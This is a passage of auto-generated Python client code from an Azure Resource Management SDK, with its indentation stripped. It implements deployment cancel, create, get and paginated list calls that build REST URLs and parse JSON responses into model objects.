deployment_operation_instance.properties = properties_instance
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
timestamp_value = properties_value.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
status_code_value = properties_value.get('statusCode', None)
if status_code_value is not None:
status_code_instance = status_code_value
properties_instance.status_code = status_code_instance
status_message_value = properties_value.get('statusMessage', None)
if status_message_value is not None:
status_message_instance = json.dumps(status_message_value)
properties_instance.status_message = status_message_instance
target_resource_value = properties_value.get('targetResource', None)
if target_resource_value is not None:
target_resource_instance = TargetResource()
properties_instance.target_resource = target_resource_instance
id_value2 = target_resource_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
target_resource_instance.id = id_instance2
resource_name_value = target_resource_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
target_resource_instance.resource_name = resource_name_instance
resource_type_value = target_resource_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
target_resource_instance.resource_type = resource_type_instance
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list_next(self, next_link):
"""
Gets a next list of deployments operations.
Args:
next_link (string): NextLink from the previous successful call to List
operation.
Returns:
DeploymentOperationsListResult: List of deployment operations.
"""
# Validate
if next_link is None:
raise ValueError('next_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + next_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = DeploymentOperationsListResult(operations=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
deployment_operation_instance = DeploymentOperation()
result.operations.append(deployment_operation_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
deployment_operation_instance.id = id_instance
operation_id_value = value_value.get('operationId', None)
if operation_id_value is not None:
operation_id_instance = operation_id_value
deployment_operation_instance.operation_id = operation_id_instance
properties_value = value_value.get('properties', None)
if properties_value is not None:
properties_instance = DeploymentOperationProperties()
deployment_operation_instance.properties = properties_instance
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
timestamp_value = properties_value.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
status_code_value = properties_value.get('statusCode', None)
if status_code_value is not None:
status_code_instance = status_code_value
properties_instance.status_code = status_code_instance
status_message_value = properties_value.get('statusMessage', None)
if status_message_value is not None:
status_message_instance = json.dumps(status_message_value)
properties_instance.status_message = status_message_instance
target_resource_value = properties_value.get('targetResource', None)
if target_resource_value is not None:
target_resource_instance = TargetResource()
properties_instance.target_resource = target_resource_instance
id_value2 = target_resource_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
target_resource_instance.id = id_instance2
resource_name_value = target_resource_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
target_resource_instance.resource_name = resource_name_instance
resource_type_value = target_resource_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
target_resource_instance.resource_type = resource_type_instance
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
class DeploymentOperations(object):
"""
Operations for managing deployments.
__NOTE__: An instance of this class is automatically created for an
instance of the [ResourceManagementClient]
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the
Microsoft.Azure.Management.Resources.ResourceManagementClient.
"""
return self._client
def cancel(self, resource_group_name, deployment_name):
"""
Cancel a currently running template deployment.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
deployment_name (string): The name of the deployment.
Returns:
AzureOperationResponse: A standard service response including an HTTP
status code and request ID.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
if deployment_name is None:
raise ValueError('deployment_name cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/deployments/'
url = url + quote(deployment_name)
url = url + '/cancel'
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'POST'
# Set Headers
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 204:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = AzureOperationResponse()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def create_or_update(self, resource_group_name, deployment_name, parameters):
"""
Create a named template deployment using a template.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
deployment_name (string): The name of the deployment.
parameters (Deployment): Additional parameters supplied to the
operation.
Returns:
DeploymentOperationsCreateResult: Template deployment operation create
result.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
if deployment_name is None:
raise ValueError('deployment_name cannot be None.')
if parameters is None:
raise ValueError('parameters cannot be None.')
if parameters.properties is not None:
if parameters.properties.parameters_link is not None:
if parameters.properties.parameters_link.uri is None:
raise ValueError('parameters.properties.parameters_link.uri cannot be None.')
if parameters.properties.template_link is not None:
if parameters.properties.template_link.uri is None:
raise ValueError('parameters.properties.template_link.uri cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/deployments/'
url = url + quote(deployment_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'PUT'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Serialize Request
request_content = None
request_doc = None
deployment_value = {}
request_doc = deployment_value
if parameters.properties is not None:
properties_value = {}
deployment_value['properties'] = properties_value
if parameters.properties.template is not None:
properties_value['template'] = json.loads(parameters.properties.template)
if parameters.properties.template_link is not None:
template_link_value = {}
properties_value['templateLink'] = template_link_value
template_link_value['uri'] = parameters.properties.template_link.uri
if parameters.properties.template_link.content_version is not None:
template_link_value['contentVersion'] = parameters.properties.template_link.content_version
if parameters.properties.parameters is not None:
properties_value['parameters'] = json.loads(parameters.properties.parameters)
if parameters.properties.parameters_link is not None:
parameters_link_value = {}
properties_value['parametersLink'] = parameters_link_value
parameters_link_value['uri'] = parameters.properties.parameters_link.uri
if parameters.properties.parameters_link.content_version is not None:
parameters_link_value['contentVersion'] = parameters.properties.parameters_link.content_version
if parameters.properties.mode is not None:
properties_value['mode'] = str(parameters.properties.mode) if parameters.properties.mode is not None else 'Incremental'
request_content = json.dumps(request_doc)
http_request.data = request_content
http_request.headers['Content-Length'] = len(request_content)
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 201:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 201:
response_content = body
result = DeploymentOperationsCreateResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
deployment_instance = DeploymentExtended()
result.deployment = deployment_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
deployment_instance.id = id_instance
name_value = response_doc.get('name', None)
if name_value is not None:
name_instance = name_value
deployment_instance.name = name_instance
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = DeploymentPropertiesExtended(dependencies=[], providers=[])
deployment_instance.properties = properties_instance
provisioning_state_value = properties_value2.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
correlation_id_value = properties_value2.get('correlationId', None)
if correlation_id_value is not None:
correlation_id_instance = correlation_id_value
properties_instance.correlation_id = correlation_id_instance
timestamp_value = properties_value2.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
outputs_value = properties_value2.get('outputs', None)
if outputs_value is not None:
outputs_instance = json.dumps(outputs_value)
properties_instance.outputs = outputs_instance
providers_array = properties_value2.get('providers', None)
if providers_array is not None:
for providers_value in providers_array:
provider_instance = Provider(resource_types=[])
properties_instance.providers.append(provider_instance)
id_value2 = providers_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
provider_instance.id = id_instance2
namespace_value = providers_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = providers_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = providers_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value3 = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value3
dependencies_array = properties_value2.get('dependencies', None)
if dependencies_array is not None:
for dependencies_value in dependencies_array:
dependency_instance = Dependency(depends_on=[])
properties_instance.dependencies.append(dependency_instance)
depends_on_array = dependencies_value.get('dependsOn', None)
if depends_on_array is not None:
for depends_on_value in depends_on_array:
basic_dependency_instance = BasicDependency()
dependency_instance.depends_on.append(basic_dependency_instance)
id_value3 = depends_on_value.get('id', None)
if id_value3 is not None:
id_instance3 = id_value3
basic_dependency_instance.id = id_instance3
resource_type_value2 = depends_on_value.get('resourceType', None)
if resource_type_value2 is not None:
resource_type_instance2 = resource_type_value2
basic_dependency_instance.resource_type = resource_type_instance2
resource_name_value = depends_on_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
basic_dependency_instance.resource_name = resource_name_instance
id_value4 = dependencies_value.get('id', None)
if id_value4 is not None:
id_instance4 = id_value4
dependency_instance.id = id_instance4
resource_type_value3 = dependencies_value.get('resourceType', None)
if resource_type_value3 is not None:
resource_type_instance3 = resource_type_value3
dependency_instance.resource_type = resource_type_instance3
resource_name_value2 = dependencies_value.get('resourceName', None)
if resource_name_value2 is not None:
resource_name_instance2 = resource_name_value2
dependency_instance.resource_name = resource_name_instance2
template_value = properties_value2.get('template', None)
if template_value is not None:
template_instance = json.dumps(template_value)
properties_instance.template = template_instance
template_link_value2 = properties_value2.get('templateLink', None)
if template_link_value2 is not None:
template_link_instance = TemplateLink()
properties_instance.template_link = template_link_instance
uri_value = template_link_value2.get('uri', None)
if uri_value is not None:
uri_instance = uri_value
template_link_instance.uri = uri_instance
content_version_value = template_link_value2.get('contentVersion', None)
if content_version_value is not None:
content_version_instance = content_version_value
template_link_instance.content_version = content_version_instance
parameters_value = properties_value2.get('parameters', None)
if parameters_value is not None:
parameters_instance = json.dumps(parameters_value)
properties_instance.parameters = parameters_instance
parameters_link_value2 = properties_value2.get('parametersLink', None)
if parameters_link_value2 is not None:
parameters_link_instance = ParametersLink()
properties_instance.parameters_link = parameters_link_instance
uri_value2 = parameters_link_value2.get('uri', None)
if uri_value2 is not None:
uri_instance2 = uri_value2
parameters_link_instance.uri = uri_instance2
content_version_value2 = parameters_link_value2.get('contentVersion', None)
if content_version_value2 is not None:
content_version_instance2 = content_version_value2
parameters_link_instance.content_version = content_version_instance2
mode_value = properties_value2.get('mode', None)
if mode_value is not None:
mode_instance = mode_value
properties_instance.mode = mode_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def get(self, resource_group_name, deployment_name):
"""
Get a deployment.
Args:
resource_group_name (string): The name of the resource group to get.
The name is case insensitive.
deployment_name (string): The name of the deployment.
Returns:
DeploymentGetResult: Template deployment information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
if deployment_name is None:
raise ValueError('deployment_name cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/deployments/'
url = url + quote(deployment_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = DeploymentGetResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
deployment_instance = DeploymentExtended()
result.deployment = deployment_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
deployment_instance.id = id_instance
name_value = response_doc.get('name', None)
if name_value is not None:
name_instance = name_value
deployment_instance.name = name_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
properties_instance = DeploymentPropertiesExtended(dependencies=[], providers=[])
deployment_instance.properties = properties_instance
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
correlation_id_value = properties_value.get('correlationId', None)
if correlation_id_value is not None:
correlation_id_instance = correlation_id_value
properties_instance.correlation_id = correlation_id_instance
timestamp_value = properties_value.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
outputs_value = properties_value.get('outputs', None)
if outputs_value is not None:
outputs_instance = json.dumps(outputs_value)
properties_instance.outputs = outputs_instance
providers_array = properties_value.get('providers', None)
if providers_array is not None:
for providers_value in providers_array:
provider_instance = Provider(resource_types=[])
properties_instance.providers.append(provider_instance)
id_value2 = providers_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
provider_instance.id = id_instance2
namespace_value = providers_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = providers_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = providers_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value2 = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value2
dependencies_array = properties_value.get('dependencies', None)
if dependencies_array is not None:
for dependencies_value in dependencies_array:
dependency_instance = Dependency(depends_on=[])
properties_instance.dependencies.append(dependency_instance)
depends_on_array = dependencies_value.get('dependsOn', None)
if depends_on_array is not None:
for depends_on_value in depends_on_array:
basic_dependency_instance = BasicDependency()
dependency_instance.depends_on.append(basic_dependency_instance)
id_value3 = depends_on_value.get('id', None)
if id_value3 is not None:
id_instance3 = id_value3
basic_dependency_instance.id = id_instance3
resource_type_value2 = depends_on_value.get('resourceType', None)
if resource_type_value2 is not None:
resource_type_instance2 = resource_type_value2
basic_dependency_instance.resource_type = resource_type_instance2
resource_name_value = depends_on_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
basic_dependency_instance.resource_name = resource_name_instance
id_value4 = dependencies_value.get('id', None)
if id_value4 is not None:
id_instance4 = id_value4
dependency_instance.id = id_instance4
resource_type_value3 = dependencies_value.get('resourceType', None)
if resource_type_value3 is not None:
resource_type_instance3 = resource_type_value3
dependency_instance.resource_type = resource_type_instance3
resource_name_value2 = dependencies_value.get('resourceName', None)
if resource_name_value2 is not None:
resource_name_instance2 = resource_name_value2
dependency_instance.resource_name = resource_name_instance2
template_value = properties_value.get('template', None)
if template_value is not None:
template_instance = json.dumps(template_value)
properties_instance.template = template_instance
template_link_value = properties_value.get('templateLink', None)
if template_link_value is not None:
template_link_instance = TemplateLink()
properties_instance.template_link = template_link_instance
uri_value = template_link_value.get('uri', None)
if uri_value is not None:
uri_instance = uri_value
template_link_instance.uri = uri_instance
content_version_value = template_link_value.get('contentVersion', None)
if content_version_value is not None:
content_version_instance = content_version_value
template_link_instance.content_version = content_version_instance
parameters_value = properties_value.get('parameters', None)
if parameters_value is not None:
parameters_instance = json.dumps(parameters_value)
properties_instance.parameters = parameters_instance
parameters_link_value = properties_value.get('parametersLink', None)
if parameters_link_value is not None:
parameters_link_instance = ParametersLink()
properties_instance.parameters_link = parameters_link_instance
uri_value2 = parameters_link_value.get('uri', None)
if uri_value2 is not None:
uri_instance2 = uri_value2
parameters_link_instance.uri = uri_instance2
content_version_value2 = parameters_link_value.get('contentVersion', None)
if content_version_value2 is not None:
content_version_instance2 = content_version_value2
parameters_link_instance.content_version = content_version_instance2
mode_value = properties_value.get('mode', None)
if mode_value is not None:
mode_instance = mode_value
properties_instance.mode = mode_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list(self, resource_group_name, parameters):
"""
Get a list of deployments.
Args:
resource_group_name (string): The name of the resource group to filter
by. The name is case insensitive.
parameters (DeploymentListParameters): Query parameters. If null is
passed returns all deployments.
Returns:
DeploymentListResult: List of deployments.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/'
url = url + 'resourcegroups/' + quote(resource_group_name) + '/'
url = url + 'deployments/'
query_parameters = []
odata_filter = []
if parameters is not None and parameters.provisioning_state is not None:
odata_filter.append('provisioningState eq \'' + quote(parameters.provisioning_state) + '\'')
if len(odata_filter) > 0:
query_parameters.append('$filter=' + ''.join(odata_filter))
if parameters is not None and parameters.top is not None:
query_parameters.append('$top=' + quote(str(parameters.top)))
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = DeploymentListResult(deployments=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
deployment_extended_instance = DeploymentExtended()
result.deployments.append(deployment_extended_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
deployment_extended_instance.id = id_instance
name_value = value_value.get('name', None)
if name_value is not None:
name_instance = name_value
deployment_extended_instance.name = name_instance
properties_value = value_value.get('properties', None)
if properties_value is not None:
properties_instance = DeploymentPropertiesExtended(dependencies=[], providers=[])
deployment_extended_instance.properties = properties_instance
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
correlation_id_value = properties_value.get('correlationId', None)
if correlation_id_value is not None:
correlation_id_instance = correlation_id_value
properties_instance.correlation_id = correlation_id_instance
timestamp_value = properties_value.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
outputs_value = properties_value.get('outputs', None)
if outputs_value is not None:
outputs_instance = json.dumps(outputs_value)
properties_instance.outputs = outputs_instance
providers_array = properties_value.get('providers', None)
if providers_array is not None:
for providers_value in providers_array:
provider_instance = Provider(resource_types=[])
properties_instance.providers.append(provider_instance)
id_value2 = providers_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
provider_instance.id = id_instance2
namespace_value = providers_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = providers_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = providers_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value2 = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value2
dependencies_array = properties_value.get('dependencies', None)
if dependencies_array is not None:
for dependencies_value in dependencies_array:
dependency_instance = Dependency(depends_on=[])
properties_instance.dependencies.append(dependency_instance)
depends_on_array = dependencies_value.get('dependsOn', None)
if depends_on_array is not None:
for depends_on_value in depends_on_array:
basic_dependency_instance = BasicDependency()
dependency_instance.depends_on.append(basic_dependency_instance)
id_value3 = depends_on_value.get('id', None)
if id_value3 is not None:
id_instance3 = id_value3
basic_dependency_instance.id = id_instance3
resource_type_value2 = depends_on_value.get('resourceType', None)
if resource_type_value2 is not None:
resource_type_instance2 = resource_type_value2
basic_dependency_instance.resource_type = resource_type_instance2
resource_name_value = depends_on_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
basic_dependency_instance.resource_name = resource_name_instance
id_value4 = dependencies_value.get('id', None)
if id_value4 is not None:
id_instance4 = id_value4
dependency_instance.id = id_instance4
resource_type_value3 = dependencies_value.get('resourceType', None)
if resource_type_value3 is not None:
resource_type_instance3 = resource_type_value3
dependency_instance.resource_type = resource_type_instance3
resource_name_value2 = dependencies_value.get('resourceName', None)
if resource_name_value2 is not None:
resource_name_instance2 = resource_name_value2
dependency_instance.resource_name = resource_name_instance2
template_value = properties_value.get('template', None)
if template_value is not None:
template_instance = json.dumps(template_value)
properties_instance.template = template_instance
template_link_value = properties_value.get('templateLink', None)
if template_link_value is not None:
template_link_instance = TemplateLink()
properties_instance.template_link = template_link_instance
uri_value = template_link_value.get('uri', None)
if uri_value is not None:
uri_instance = uri_value
template_link_instance.uri = uri_instance
content_version_value = template_link_value.get('contentVersion', None)
if content_version_value is not None:
content_version_instance = content_version_value
template_link_instance.content_version = content_version_instance
parameters_value = properties_value.get('parameters', None)
if parameters_value is not None:
parameters_instance = json.dumps(parameters_value)
properties_instance.parameters = parameters_instance
parameters_link_value = properties_value.get('parametersLink', None)
if parameters_link_value is not None:
parameters_link_instance = ParametersLink()
properties_instance.parameters_link = parameters_link_instance
uri_value2 = parameters_link_value.get('uri', None)
if uri_value2 is not None:
uri_instance2 = uri_value2
parameters_link_instance.uri = uri_instance2
content_version_value2 = parameters_link_value.get('contentVersion', None)
if content_version_value2 is not None:
content_version_instance2 = content_version_value2
parameters_link_instance.content_version = content_version_instance2
mode_value = properties_value.get('mode', None)
if mode_value is not None:
mode_instance = mode_value
properties_instance.mode = mode_instance
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list_next(self, next_link):
"""
Get a list of deployments.
Args:
next_link (string): NextLink from the previous successful call to List
operation.
Returns:
DeploymentListResult: List of deployments.
"""
# Validate
if next_link is None:
raise ValueError('next_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + next_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = DeploymentListResult(deployments=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
deployment_extended_instance = DeploymentExtended()
result.deployments.append(deployment_extended_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
deployment_extended_instance.id = id_instance
name_value = value_value.get('name', None)
if name_value is not None:
name_instance = name_value
deployment_extended_instance.name = name_instance
properties_value = value_value.get('properties', None)
if properties_value is not None:
properties_instance = DeploymentPropertiesExtended(dependencies=[], providers=[])
deployment_extended_instance.properties = properties_instance
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
correlation_id_value = properties_value.get('correlationId', None)
if correlation_id_value is not None:
correlation_id_instance = correlation_id_value
properties_instance.correlation_id = correlation_id_instance
timestamp_value = properties_value.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
outputs_value = properties_value.get('outputs', None)
if outputs_value is not None:
outputs_instance = json.dumps(outputs_value)
properties_instance.outputs = outputs_instance
providers_array = properties_value.get('providers', None)
if providers_array is not None:
for providers_value in providers_array:
provider_instance = Provider(resource_types=[])
properties_instance.providers.append(provider_instance)
id_value2 = providers_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
provider_instance.id = id_instance2
namespace_value = providers_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = providers_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = providers_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
